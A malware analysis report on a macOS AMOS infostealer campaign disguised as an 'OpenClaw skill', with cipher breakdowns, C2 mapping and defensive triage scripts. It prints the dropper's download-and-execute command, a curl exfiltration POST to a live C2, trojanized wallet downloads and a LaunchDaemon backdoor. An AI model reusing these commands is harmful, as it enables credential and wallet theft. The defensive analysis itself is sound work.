Fake "OpenClaw Skill" AMOS Stealer: Cracking Two Encryption Schemes, Authenticating Against a Live C2, and Mapping an Active macOS Infostealer Campaign
TL;DR: A macOS infostealer distributed via social engineering -- disguised as an "OpenClaw skill" for Claude Code -- was fully reverse-engineered, both encryption schemes cracked, and the live C2 server authenticated against. The threat actor replaced the payload with a hardened version during our 14-hour analysis window, rotating from an XOR stream cipher to a dual-array subtraction cipher and adding anti-VM gating. Both v1 and v2 decrypt to nearly identical ~63KB AppleScript stealers targeting 13 Chromium browsers, 16 cryptocurrency wallets, 280 browser wallet extensions, Apple Keychain, Safari, Telegram, and Apple Notes. The C2 infrastructure spans a bare-metal Cogent server, a re-registered 7-year-old expired domain behind Cloudflare, and a defunct SaaS platform repurposed for trojanized wallet delivery.
Campaign Overview
On March 2, 2026, we intercepted an active social engineering campaign targeting developers in the Claude Code ecosystem. The lure: a direct message claiming to have found a "weird OpenClaw skill" -- name-dropping the legitimate OpenClaw gateway product to establish credibility. The message includes a fake quickstart guide containing a base64-encoded shell command.
This is AMOS (Atomic macOS Stealer), a C++ variant operating as Malware-as-a-Service. The operator is iterating fast: the binary was replaced mid-analysis, the C2 was hardened within 29 minutes of our authenticated probing, and all three infrastructure domains were registered through the same registrar within a 5-day window.
Kill Chain
```
Social Engineering (DM: "hey i found this weird openclaw skill")
        |
        v
Stage 0: base64 + gzip encoded shell command
        |  eval "$decoded"
        v
Stage 1: curl from saramoftah[.]com/curl/<sha256_hash>
        |  User-Agent filtered -- only curl/ clients get the payload
        |  Browsers see a fake 404 page
        v
Stage 2: Mach-O universal binary dropped to /tmp/helper
        |  xattr -c  --> bypass Gatekeeper quarantine
        |  chmod +x  --> execute
        v
Stealer: 62,900-byte AppleScript via osascript
        |  Phishing dialog: "Application wants to install helper"
        |  Password validated via dscl . authonly
        |  Exfil: ditto zip --> curl POST to C2
        |  Persistence: LaunchDaemon com.finder.helper
        |  Cleanup: rm artifacts + pkill Terminal
        v
Trojanized Wallet Apps: Ledger Wallet + Trezor Suite replaced
```
Stage 1: The Dropper
The initial payload at hxxps://saramoftah[.]com/curl/<sha256> delivers a gzipped, base64-encoded zsh script. The URL path uses a SHA256-like hash to mimic content-addressed storage systems.
```zsh
#!/bin/zsh
mkgrc9=$(base64 -D <<'PAYLOAD_END' | gunzip
H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFM
BpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA
PAYLOAD_END
)
eval "$mkgrc9"
```
Decoded:
```bash
curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
```
The /n8n/update path mimics the legitimate n8n workflow automation platform. The xattr -c strips the com.apple.quarantine attribute, neutralizing Gatekeeper without any user interaction.
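A static decoder for that dropper shape, added here as an example and not code from the report: it extracts the heredoc the script pipes through `base64 -D | gunzip`, decodes it in memory and returns the command that `eval` would have run, so an analyst can read Stage 0 without executing it. The `build_sample_script` helper and the sample command it packages are constructed for the demonstration and are not the campaign's blob.

```python
"""Static Stage 0 decoder for the base64+gzip heredoc dropper pattern.
Added example, not code from the report. The sample script is constructed
around a harmless command so the decoder can be exercised offline."""
import base64
import gzip
import re

# Matches the shape  VAR=$(base64 -D <<'TAG' | gunzip ... TAG ) on macOS (-D)
# or GNU coreutils (-d); the heredoc tag may be quoted or bare.
HEREDOC_RE = re.compile(
    r"base64\s+-[dD]\s*<<-?\s*'?(?P<tag>\w+)'?\s*\|\s*gunzip\s*\n"
    r"(?P<blob>.*?)\n(?P=tag)\b",
    re.S,
)


def extract_stage0_command(script: str) -> str:
    """Decode the heredoc blob without evaluating anything."""
    m = HEREDOC_RE.search(script)
    if not m:
        raise ValueError("no base64 | gunzip heredoc found")
    blob = "".join(m.group("blob").split())          # undo base64 line wrapping
    raw = gzip.decompress(base64.b64decode(blob))
    return raw.decode("utf-8", errors="replace").strip()


def triage(script: str) -> dict:
    """Decode and flag the traits the report calls out in the real dropper."""
    cmd = extract_stage0_command(script)
    return {
        "command": cmd,
        "downloads": bool(re.search(r"\bcurl\b", cmd)),
        "strips_quarantine": ("xattr -c" in cmd) or ("xattr -d com.apple.quarantine" in cmd),
        "executes_tmp": bool(re.search(r"(^|&&|;)\s*/tmp/\S+", cmd)),
    }


def build_sample_script(command: str, var: str = "mkgrc9") -> str:
    """Constructed: package a command the same way the dropper does, so the
    decoder has realistic input. Not the campaign's payload."""
    blob = base64.b64encode(gzip.compress(command.encode())).decode()
    wrapped = "\n".join(blob[i:i + 72] for i in range(0, len(blob), 72))
    return (f"#!/bin/zsh\n{var}=$(base64 -D <<'PAYLOAD_END' | gunzip\n"
            f"{wrapped}\nPAYLOAD_END\n)\neval \"${var}\"\n")


# Constructed sample: echoes a string, then mirrors the xattr/exec pattern
SAMPLE_COMMAND = 'echo "constructed sample" && xattr -c /tmp/sample && /tmp/sample'
SAMPLE_SCRIPT = build_sample_script(SAMPLE_COMMAND)

if __name__ == "__main__":
    for k, v in triage(SAMPLE_SCRIPT).items():
        print(f"{k}: {v}")
```

Point the function at a captured script instead of `SAMPLE_SCRIPT`; the regex tolerates both the macOS `-D` and GNU `-d` base64 flags and any heredoc tag name.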
Server-Side User-Agent Filtering
The delivery server discriminates on User-Agent with a case-insensitive regex matching curl/ followed by a version:
| User-Agent | Response |
|---|---|
| curl/8.5.0 (default) | 200 -- serves Mach-O binary |
| curl/7.88.1 | 200 -- serves Mach-O binary |
| Mozilla/5.0 (any browser) | 404 -- fake nginx error page |
| python-requests/2.31.0 | 404 |
| Wget/1.21 | 404 |
| (empty) | 404 |
This defeats casual researcher inspection (visiting in a browser shows "404"), standard crawlers, and automated sandboxes using non-curl User-Agents.
Stage 2: Binary Analysis
v1 -- Self-Contained Stealer (first observed 2026-03-02 02:46 UTC)
| Property | Value |
|---|---|
| Type | Mach-O FAT (x86_64 + arm64) |
| Size | 578,152 bytes |
| SHA256 (fat) | 2db8a97685a7ba523efa88308a765b3b33a6370333dc1044c2b3e45be513caa6 |
| SHA256 (x86_64) | c0e288edacfc500309d4b5aa9d3a63024e4daeaf4d7a301184d5acc761a9b789 |
| SHA256 (arm64) | 43aa9e588b0af8524bdde6c5e2f685c0a9085d8034e145fac37d7c7a205706fe |
| UUID (x86_64) | 7d6ac493-cc95-3930-9f41-13263f1f9c88 |
The binary is 97% encrypted data, 3% code:
| Section | Size | Purpose |
|---|---|---|
| `__TEXT.__text` | 7,506 B | Decryption stub -- ~28 functions total |
| `__TEXT.__const` | 252,068 B | Encrypted payload (entropy 6.97) |
| `__DATA.__la_symbol_ptr` | 104 B | 13 lazy symbol entries |
The import table is deliberately minimal: dlsym for dynamic API resolution, bzero, steady_clock::now() for anti-debug timing, and C++ runtime functions. Everything else -- system(), file I/O, network calls -- is resolved at runtime through dlsym(RTLD_DEFAULT, "decrypted_function_name"). Static analysis tools like otool -L reveal nothing about the binary's actual capabilities.
v2 -- Dropper Variant (replaced v1 at ~16:00 UTC, same day)
| Property | Value |
|---|---|
| Size | 2,881,016 bytes (+398%) |
| SHA256 (fat) | f42e795b098e35075ed2d3601b8fe3dc60a745f4c29cb82e994cdda096a71df3 |
| UUID (x86_64) | 8b42d9ad-f901-37fc-bb34-ea4d86791665 |
| UUID (arm64) | 2dfe2ad3-5f58-3a94-8ba7-247d722ff953 |
Critical changes from v1:
| Feature | v1 | v2 |
|---|---|---|
| Size | 578 KB | 2,881 KB |
| `__TEXT.__const` | 246 KB | 1,359 KB (+452%) |
| API resolution | dlsym (runtime) | fork/execvp/waitpid |
| `__cstring` | none | /bin/zsh -c |
| Anti-VM | none | system_profiler checks |
| Encryption | XOR stream + S-box | Dual-array subtraction |
| Execution model | Self-contained | Decrypts shell command, forks zsh |
v2 is architecturally a dropper: it decrypts a command, fork()s, and the child calls execvp("/bin/zsh", ["/bin/zsh", "-c", <command>]). The stealer logic now runs as a shell-invoked AppleScript rather than through hooked native API calls, evading behavioral detection that intercepts SecItemCopyMatching or sqlite3_open.
Cracking the Encryption
v1: XOR Stream Cipher + 256-Byte S-Box Substitution
The v1 binary uses a 4-layer encryption scheme:
Layer 1 -- Custom Base64 Alphabet Generation:
Five 512-byte lookup tables (128 entries each) at __const offsets produce a 64-byte custom alphabet via rotational arithmetic:
```python
def derive_alphabet(table_A, table_B, table_C, table_D, table_E):
    # Each table holds 128 uint32 entries read from __const; index i of
    # every table contributes to one output byte.
    sbox = bytearray(128)
    for i in range(128):
        diff = (table_A[i] - table_E[i]) & 0xFFFFFFFF
        shift = table_D[i] & 7
        part1 = (diff & 0xFF) >> shift                 # rotate the low byte of diff
        part2 = (diff << ((-shift) & 7)) & 0xFF        # right by `shift` bits
        combined = part1 | part2
        result = ((combined ^ table_C[i]) - table_B[i]) & 0xFF
        sbox[i] = result
    return bytes(sbox)
```
Output: Lu-JtepNPYm3WcHE7w%$q+sKRjdBlvaF_)IS#Qf*A(nUr2>@TboxX&Z!O18?gzV6
Layer 2 -- XOR Stream Cipher + Substitution:
```python
def decrypt_v1_layer2(const_data: bytes) -> bytes:
    sbox256 = const_data[171040:171040 + 256]       # 256-byte permutation table
    encrypted = const_data[3296:3296 + 167734]
    key = 0x5C                                      # initial key
    output = bytearray(167734)
    for i in range(167734):
        xored = encrypted[i] ^ (key & 0xFF)
        decrypted = sbox256[xored]
        output[i] = decrypted
        key = ((key ^ decrypted) + i) & 0xFFFFFFFF  # rolling key update, fed by plaintext
    return bytes(output)
```
Layers 3-4: Hex decode the stream cipher output, then custom base64 decode using the Layer 1 alphabet. Final output: 62,900-byte cleartext AppleScript.
v2: Dual-Array Subtraction Cipher + Anti-VM Gate
v2 uses a completely different encryption architecture. The 5x size increase is explained by the dual-array encoding: each byte is stored as two correlated uint32 values across parallel arrays.
Stage A -- Custom Alphabet (same triplet method, different tables):
128 triplets produce a new 64-byte alphabet:
j5Z_Do?iVH=2+9O#d0QCwBAlgq<>uU68NT*EF1Yke4ac!$tM-X%GKLSmnIJv&p)@
Stage B -- Anti-VM Guard (new in v2):
Before decrypting the main payload, v2 fork/exec's a 1,516-byte AppleScript that checks:
| Check | Command | Kill Indicators |
|---|---|---|
| Memory | system_profiler SPMemoryDataType | QEMU, VMware, KVM |
| Hardware | system_profiler SPHardwareDataType | Z31FHXYQ0J, C07T508TG1J2, C02TM2ZBHX87, Chip: Unknown, Intel Core 2 |
The serial numbers Z31FHXYQ0J, C07T508TG1J2, and C02TM2ZBHX87 are defaults used by VMware Fusion and Parallels Desktop VMs. If any match, exit code 100 is returned and the main payload is never decrypted -- it never exists in memory inside a sandbox.
Stage C -- Main Payload (the new cipher):
```python
import struct

def decrypt_v2_stage_c(const_data: bytes) -> bytes:
    # Two parallel arrays, 167,694 uint32 entries each
    n = 167694
    data1 = const_data[48544:48544 + n * 4]        # 670,776 bytes
    data2 = const_data[719328:719328 + n * 4]      # 670,776 bytes
    output = bytearray(n)
    for i in range(n):
        val1 = struct.unpack_from("<I", data1, i * 4)[0]   # little-endian uint32
        val2 = struct.unpack_from("<I", data2, i * 4)[0]
        output[i] = ((val2 >> 16) ^ (val1 - val2)) & 0xFF
    return bytes(output)
```
Output: 167,694 hex chars --> hex decode (83,847 bytes) --> base64 decode --> 62,885 bytes of AppleScript.
Stage D -- Cleanup Command (XOR + S-box, initial key 0x1D):
Decrypts to: disown; pkill Terminal
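To make the two schemes concrete, the following is an added example (not code from the report or from the malware) that models the v1 Layer 2 stream cipher and the v2 Stage C dual-array cipher as round trips. The decrypt loops follow the report; the S-box, the encoder halves, the `demo` wrapper and the sample AppleScript fragment are constructed here so both decoders can be exercised offline, and the v1 custom alphabet is the one recovered in Layer 1 above.

```python
"""Round-trip models of the v1 XOR/S-box cipher and the v2 dual-array cipher.
Added example, not the report's or the malware's code: decrypt loops follow
the report; the S-box, encoders and sample plaintext are constructed."""
import base64
import random
import struct

# Custom base64 alphabet recovered from v1 (report, Layer 1 output)
V1_ALPHABET = "Lu-JtepNPYm3WcHE7w%$q+sKRjdBlvaF_)IS#Qf*A(nUr2>@TboxX&Z!O18?gzV6"
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def custom_b64decode(text: str, alphabet: str = V1_ALPHABET) -> bytes:
    """Custom-alphabet base64 is a translation table; padding repair is assumed."""
    assert len(set(alphabet)) == 64
    std = text.translate(str.maketrans(alphabet, STD_ALPHABET))
    return base64.b64decode(std + "=" * (-len(std) % 4))


def custom_b64encode(raw: bytes, alphabet: str = V1_ALPHABET) -> str:
    std = base64.b64encode(raw).decode().rstrip("=")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


# ---- v1: XOR with a rolling 32-bit key, then 256-byte S-box substitution ----
def v1_decrypt(encrypted: bytes, sbox256: bytes, key: int = 0x5C) -> bytes:
    """The key schedule feeds back the *decrypted* byte, so the keystream
    cannot be generated without recovering the plaintext as you go."""
    out = bytearray()
    for i, c in enumerate(encrypted):
        p = sbox256[c ^ (key & 0xFF)]
        out.append(p)
        key = ((key ^ p) + i) & 0xFFFFFFFF
    return bytes(out)


def v1_encrypt(plain: bytes, sbox256: bytes, key: int = 0x5C) -> bytes:
    """Constructed inverse: invert the permutation, then XOR with the same
    rolling key, which the encryptor can compute because it knows plaintext."""
    inv = bytearray(256)
    for idx, val in enumerate(sbox256):
        inv[val] = idx
    out = bytearray()
    for i, p in enumerate(plain):
        out.append(inv[p] ^ (key & 0xFF))
        key = ((key ^ p) + i) & 0xFFFFFFFF
    return bytes(out)


# ---- v2: two parallel uint32 arrays, one plaintext byte per pair ----
def v2_decrypt(data1: bytes, data2: bytes) -> bytes:
    """byte = low8((val2 >> 16) ^ (val1 - val2)), as in the report."""
    out = bytearray()
    for i in range(len(data1) // 4):
        val1 = struct.unpack_from("<I", data1, i * 4)[0]
        val2 = struct.unpack_from("<I", data2, i * 4)[0]
        out.append(((val2 >> 16) ^ (val1 - val2)) & 0xFF)
    return bytes(out)


def v2_encrypt(plain: bytes, rng=None):
    """Constructed encoder: val2 is random filler; val1 is chosen so the low
    byte of (val1 - val2) XORs with bits 16..23 of val2 to the plaintext. The
    upper 24 bits of the difference are free, so every plaintext byte costs
    8 bytes of storage, which is the size growth the report describes."""
    rng = rng or random.Random(0)
    d1, d2 = bytearray(), bytearray()
    for p in plain:
        val2 = rng.getrandbits(32)
        diff_low = p ^ ((val2 >> 16) & 0xFF)
        val1 = (val2 + diff_low + (rng.getrandbits(24) << 8)) & 0xFFFFFFFF
        d1 += struct.pack("<I", val1)
        d2 += struct.pack("<I", val2)
    return bytes(d1), bytes(d2)


def demo(script: bytes = b'display dialog "constructed sample"\n') -> dict:
    """Layer a constructed AppleScript fragment the way each version stores
    it, then recover it with the decrypt loops."""
    rng = random.Random(20260302)
    sbox = bytearray(range(256))
    rng.shuffle(sbox)                                   # constructed permutation
    sbox = bytes(sbox)
    # v1: custom base64 -> hex text -> XOR/S-box (decrypt runs the reverse)
    v1_inner = custom_b64encode(script).encode().hex().encode()
    v1_blob = v1_encrypt(v1_inner, sbox)
    v1_hex = v1_decrypt(v1_blob, sbox).decode()
    v1_plain = custom_b64decode(bytes.fromhex(v1_hex).decode())
    # v2: standard base64 -> hex text -> dual arrays
    v2_inner = base64.b64encode(script).hex().encode()
    d1, d2 = v2_encrypt(v2_inner, rng)
    v2_plain = base64.b64decode(bytes.fromhex(v2_decrypt(d1, d2).decode()))
    return {"v1": v1_plain, "v2": v2_plain,
            "v2_bytes_per_input_byte": (len(d1) + len(d2)) / len(v2_inner)}


if __name__ == "__main__":
    print(demo())
```

The v1 feedback schedule is what makes the stream unusable as a reusable keystream: a wrong S-box or initial key desynchronises every following byte. The v2 encoder shows why the scheme is bulky rather than strong: only eight bits of each 64-bit pair carry information, and the decoder needs no key at all, just the two offsets.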
v1 vs v2 Payload Diff
Both produce 951-line AppleScripts. Out of 216 unique decoded strings, 214 are identical. Only the C2 credentials rotated:
| Field | v1 | v2 |
|---|---|---|
| user header (auth token) | ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ= | -czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw= |
| BuildID header | brIyWXoYkYAXOR/cnm/2l8iLv3rlv0EUdYZcPwKB5fU= | iQorUGf6SNQ1EChuIzMqfvTavnAP5gPolmR43L0n2Ss= |
All obfuscated variable names are re-randomized (e.g., hxnpplbhay --> hhhoudflfd), but the stealing logic, target list, and exfiltration method are identical.
Decrypted Payload: What the Stealer Takes
Password Phishing
The stealer presents a fake system dialog:
Title: "Application wants to install helper"
Message: "Required Application Helper. Please enter device password to continue."
Button: "Continue"
Password validation: dscl . authonly <username> <password>. Loops until correct (150-second timeout).
Browser Theft (13 Chromium + 2 Firefox)
Chromium targets:
| Browser | Application Support Path |
|---|---|
| Chrome | Google/Chrome/ |
| Brave | BraveSoftware/Brave-Browser/ |
| Edge | Microsoft Edge/ |
| Vivaldi | Vivaldi/ |
| Opera | com.operasoftware.Opera/ |
| Opera GX | com.operasoftware.OperaGX/ |
| Chrome Beta/Canary/Dev | Google/Chrome Beta/, Canary/, Dev/ |
| Chromium | Chromium/ |
| Arc | Arc/User Data/ |
| CocCoc | CocCoc/Browser/ |
Per-profile data stolen: Cookies, Login Data, Web Data, Local Extension Settings, Local Storage leveldb, IndexedDB, History.
Firefox targets: Firefox and Waterfox profile directories -- cookies.sqlite, formhistory.sqlite, key4.db, logins.json, places.sqlite.
Cryptocurrency Wallet Theft (16 Desktop + 280 Extensions)
| Wallet | Target Path |
|---|---|
| Electrum | ~/.electrum/wallets/ |
| Coinomi | Coinomi/wallets/ |
| Exodus | Exodus/ |
| Atomic | atomic/Local Storage/leveldb/ |
| Wasabi | ~/.walletwasabi/client/Wallets/ |
| Ledger Live | Ledger Live/ |
| Monero | Monero/wallets/ |
| Bitcoin Core | Bitcoin/wallets/ |
| Litecoin Core | Litecoin/wallets/ |
| Dash Core | DashCore/wallets/ |
| Electrum-LTC | ~/.electrum-ltc/wallets/ |
| Electron Cash | ~/.electron-cash/wallets/ |
| Guarda | Guarda/ |
| Dogecoin Core | Dogecoin/wallets/ |
| Trezor Suite | @trezor/suite-desktop/ |
| Sparrow | ~/.sparrow/wallets/ |
The stealer also scans Chromium Local Extension Settings for 280 wallet extension IDs (MetaMask, Phantom, Rabby, etc.) and exfiltrates their entire data directories.
Desktop Wallet App Trojaning
If the macOS password was captured, the stealer replaces legitimate wallet applications with trojanized clones:
```bash
# Kill, replace, and relaunch Ledger Wallet
pkill "Ledger Wallet"
echo <password> | sudo -S rm -r /Applications/Ledger Wallet.app
curl https://wusetail.com/zxc/app.zip -o /tmp/app.zip
ditto -x -k /tmp/app.zip /Applications
chmod -R +x /Applications/Ledger Wallet.app
open /Applications/Ledger Wallet.app
# Same for Trezor Suite (from wusetail.com/zxc/apptwo.zip)
```
Other Targets
| Target | Method |
|---|---|
| macOS Keychain | Copies login.keychain-db + UUID-named keychain |
| Safari | Cookies.binarycookies, Form Values, container cookies |
| Apple Notes | Scripting Bridge (reads ALL notes, ALL accounts) + NoteStore.sqlite + media attachments (up to 30MB) |
| Telegram | tdata/ session directory |
| OpenVPN | profiles/ directory |
| Desktop/Documents files | FileGrabber: txt, pdf, docx, wallet, key, keys, seed, kdbx, jpg, png (30MB cap) |
| Installed apps | Full /Applications/ listing |
| Hardware UUID | system_profiler SPHardwareDataType |
Exfiltration
```bash
ditto -c -k --sequesterRsrc /tmp/<random>/ /tmp/out.zip
curl --connect-timeout 120 --max-time 300 -X POST \
  -H "user: <auth_token>" \
  -H "BuildID: <build_id>" \
  -H "cl: 0" -H "cn: 0" \
  -F "file=@/tmp/out.zip" \
  http://38.244.158.103/contact
# Fallback: https://avipstudios.com/contact (3 retries, 15s delay)
```
Note the header semantics are deliberately swapped: the user header carries the authentication token (not a username), and BuildID carries the build identifier. The obfuscated variable flow maps vzaetuerljii --> user: and iqcighlghfi --> BuildID:.
C2 Infrastructure
Architecture
```
PAYLOAD DELIVERY                          DATA EXFILTRATION
================                          =================
saramoftah[.]com                          38.244.158.103 (Primary C2)
  Cloudflare-fronted                        Cogent AS174, bare IP, HTTP only
  Reg: 2026-02-28                           nginx --> Javalin/Jetty backend
  Serves /curl/* (UA-gated)                 POST /contact (auth required)
  Serves /n8n/update                              |
                                                  | fallback
                                                  v
                                          avipstudios[.]com (Backup C2)
                                            Cloudflare-fronted
                                            Reg: 2026-02-23 (re-registered
                                            expired domain, orig. 2019-2025)
                                            Identical backend behavior

TROJAN DELIVERY
===============
wusetail[.]com (Persistence/Trojan server)
  EXPIRED -- DNS does not resolve
  /zxc/app.zip    (trojanized Ledger Wallet)
  /zxc/apptwo.zip (trojanized Trezor Suite)
  /zxc/kito       (persistence backdoor)
  History: restaurant/franchise SaaS (McAlister's, Slim Chickens, etc.)
```
Primary C2: 38.244.158.103
| Field | Value |
|---|---|
| ASN | AS174 Cogent Communications |
| Subnet | 38.244.128.0/17 (3NT Solutions allocation) |
| Open Ports | 22 (SSH), 80 (HTTP) |
| SSH | OpenSSH_8.9p1 Ubuntu-3ubuntu0.13 (Ubuntu 22.04) |
| Web Server | nginx --> Javalin/Jetty (Java/Kotlin backend) |
| HTTPS | Not available |
| Reverse DNS | None |
| Shodan | No information |
| OTX | Reputation 0 (clean) |
SSH Host Key Fingerprints:
```
ED25519: SHA256:jhptH1+QOYbydpnl6BqPbnahYE1ZbknFDBUeJRXSK80
RSA:     SHA256:xGM9p/DWxEkjEW4Twn71ul54cq4zsbGK0s2uTjDSUF8
ECDSA:   SHA256:BVVMZBdgWgCinQc0GXoIaxF2Q6K9kV1f0BMeCRvkmno
```
The CSP headers leak the admin panel technology stack:
```http
Content-Security-Policy: default-src 'self';
  script-src 'self' 'unsafe-inline' https://code.jquery.com https://cdn.jsdelivr.net;
  style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net;
  img-src 'self' data:;
  font-src 'self'; connect-src 'self'
```
jQuery + jsdelivr CDN (likely Bootstrap) with unsafe-inline -- indicates a web admin panel exists, though it was not accessible on port 80 during our analysis.
C2 Protocol (Fully Reverse-Engineered)
We authenticated against the live C2 using credentials extracted from the decrypted payload and mapped the full error protocol:
| HTTP Status | Body | Meaning |
|---|---|---|
| 400 | Error 1005 | Authentication failure (invalid user token) |
| 400 | Error 1013 | Missing multipart content-type |
| 400 | file too small | Auth OK, file under minimum size (~2KB) |
| 409 | Error 1012 | Format conflict or credential rotation |
| 200 | OK | Upload accepted |
Minimum viable exfiltration request requires: user header (validated), cl header (any value), and a multipart file field (size-checked).
Backup C2: avipstudios[.]com
Registered 2026-02-23 via Hello Internet Corp -- a re-registered expired domain. Certificate Transparency logs show continuous Let's Encrypt coverage from 2019-02-07 through 2025-10-19 under the original owner (cPanel infrastructure: webmail, cpcontacts, webdisk subdomains). The domain expired and was snatched by the threat actor to bypass domain reputation systems using 7 years of legitimate history.
Trojan Server: wusetail[.]com
Not currently registered (WHOIS returns "No match"). CT logs reveal it was a restaurant/franchise management SaaS platform serving brands like McAlister's Deli, Slim Chickens, Noodles, and Swig -- with subdomains for admin, api, app, dashboard, staging, QA, and UUID-based tenant instances. The attacker either compromised it before expiry or re-registered afterward to host backdoor payloads at /zxc/.
Registrar Correlation
All attacker-controlled domains use Hello Internet Corp (IANA ID 1924):
| Domain | Registered | Purpose |
|---|---|---|
| avipstudios[.]com | 2026-02-23 | Backup C2 |
| saramoftah[.]com | 2026-02-28 | Payload delivery |
Persistence Mechanism
The stealer installs a system-level LaunchDaemon:
Phase 1 -- Download backdoor:
```bash
curl -o /Users/<user>/.mainhelper https://wusetail.com/zxc/kito
```
Phase 2 -- Create agent script (~/.agent):
```bash
while true; do
  osascript <<EOF
set loginContent to do shell script "stat -f \"%Su\" /dev/console"
if loginContent is not equal to "" and loginContent is not equal to "root"
  do shell script "sudo -u " & quoted form of loginContent & " /Users/<user>/.mainhelper"
end if
EOF
  sleep 1
done
```
Phase 3 -- Install LaunchDaemon (/Library/LaunchDaemons/com.finder.helper.plist):
```xml
<dict>
  <key>Label</key>
  <string>com.finder.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>/Users/<user>/.agent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
```
The daemon runs at boot, keeps alive on crash, and continuously executes the backdoor binary as the currently logged-in console user.
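A host-side check for that persistence chain, added here as an example and not code from the report: it reads LaunchDaemon plists and flags the pattern used by `com.finder.helper` (a system daemon whose `ProgramArguments` hand an interpreter a hidden script inside a user's home, with `RunAtLoad` and `KeepAlive` both set), and it looks for the dotfile artifacts listed in the IoC section. The Apple-looking-label heuristic rests on the assumption that Apple's own daemons live under `/System/Library/LaunchDaemons`, so a `com.apple.*` or `com.finder.*` label in `/Library/LaunchDaemons` is worth a look; the sample plists and the `analyst` username are constructed.

```python
"""Host triage for the LaunchDaemon persistence pattern described above.
Added example, not code from the report. Sample plists are constructed."""
import plistlib
import re
from pathlib import Path

# Per-user dotfiles and system paths the report lists as host artifacts
HOST_ARTIFACTS = [".agent", ".mainhelper", ".logged", ".pass", ".username"]
SYSTEM_ARTIFACTS = ["/tmp/helper", "/tmp/out.zip",
                    "/Library/LaunchDaemons/com.finder.helper.plist"]
INTERPRETERS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/osascript"}
HIDDEN_HOME_SCRIPT = re.compile(r"^/Users/[^/]+/\.[^/]+$")   # /Users/x/.something


def assess_launchdaemon(plist_bytes: bytes) -> list:
    """Return the reasons a LaunchDaemon plist matches this persistence pattern
    (empty list means nothing matched)."""
    d = plistlib.loads(plist_bytes)
    args = d.get("ProgramArguments") or []
    label = d.get("Label", "")
    reasons = []
    if args and args[0] in INTERPRETERS and any(HIDDEN_HOME_SCRIPT.match(a) for a in args[1:]):
        reasons.append("interpreter launches a hidden script under /Users")
    if d.get("RunAtLoad") and d.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: restarts if killed")
    if re.match(r"com\.(apple|finder)\.", label):
        reasons.append(f"Apple-looking label {label!r} in a third-party daemon dir")
    return reasons


def scan_host(daemon_dir: str = "/Library/LaunchDaemons", users_dir: str = "/Users") -> list:
    """Walk the daemon directory and user homes; return human-readable findings."""
    findings = []
    for plist in sorted(Path(daemon_dir).glob("*.plist")):
        try:
            reasons = assess_launchdaemon(plist.read_bytes())
        except Exception as exc:                       # binary/corrupt plist, permissions
            findings.append(f"{plist}: unreadable ({exc})")
            continue
        if reasons:
            findings.append(f"{plist}: " + "; ".join(reasons))
    for home in sorted(Path(users_dir).glob("*")):
        for name in HOST_ARTIFACTS:
            if (home / name).exists():
                findings.append(f"{home / name}: artifact path from this campaign")
    for path in SYSTEM_ARTIFACTS:
        if Path(path).exists():
            findings.append(f"{path}: artifact path from this campaign")
    return findings


# Constructed from the report's plist fields (username is a placeholder)
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.finder.helper",
    "ProgramArguments": ["/bin/bash", "/Users/analyst/.agent"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
# Constructed benign daemon for comparison
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Library/Example/updater", "--check"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    print("sample:", assess_launchdaemon(SAMPLE_PLIST))
    print("benign:", assess_launchdaemon(BENIGN_PLIST))
    for line in scan_host():
        print(line)
```

Run it as root on a suspect Mac so `/Library/LaunchDaemons` and other users' homes are readable; a hit on the first reason alone is already unusual for legitimate software, which normally points `ProgramArguments` at a binary under `/Library` or `/Applications`.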
Operator Response to Analysis
Within 29 minutes of our first authenticated probe, the operator hardened the C2:
| Change | Before (19:16 UTC) | After (19:45 UTC) |
|---|---|---|
| /console/* endpoints | 400 Bad Request | 404 (removed) |
| Upload with valid auth | HTTP 200 "OK" | 409 "Error 1012" |
| Upload with v1 creds | "file too small" | "Error 1012" |
| Auth validation | Still works | Still works |
The operator removed admin console endpoints, likely rotated credential validation or added IP filtering, but did not change the CSP headers or general server configuration. The authentication mechanism itself (returning Error 1005 for invalid tokens) remained functional -- only uploads were blocked.
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| Phishing: Spearphishing via Service | T1566.003 | DM impersonating community member |
| User Execution: Malicious File | T1204.002 | curl \| bash install pattern |
| Command and Scripting Interpreter: AppleScript | T1059.002 | 62KB osascript payload |
| Command and Scripting Interpreter: Unix Shell | T1059.004 | zsh dropper, bash agent script |
| Subvert Trust Controls: Gatekeeper Bypass | T1553.001 | xattr -c removes quarantine |
| Credentials from Password Stores: Keychain | T1555.001 | Copies login.keychain-db |
| Credentials from Web Browsers | T1555.003 | 13 Chromium + 2 Firefox |
| Input Capture: GUI Input Capture | T1056.002 | Fake "install helper" dialog |
| Steal Web Session Cookie | T1539 | Cookies.binarycookies, browser cookies |
| Data from Local System | T1005 | FileGrabber, Notes, wallet files |
| Application Layer Protocol: Web | T1071.001 | curl POST multipart to /contact |
| Exfiltration Over C2 Channel | T1041 | ZIP archive via HTTP POST |
| Boot or Logon Autostart: Launch Daemon | T1543.004 | com.finder.helper LaunchDaemon |
| Masquerading: Match Legitimate Name | T1036.005 | "com.finder.helper" mimics macOS |
| Virtualization/Sandbox Evasion: System Checks | T1497.001 | system_profiler VM detection (v2) |
| Obfuscated Files or Information | T1027 | Multi-layer custom encryption |
| Dynamic Resolution: dlsym | T1106 | Runtime API resolution (v1) |
| Supply Chain Compromise: Compromise Software Supply Chain | T1195.002 | Trojanized Ledger/Trezor apps |
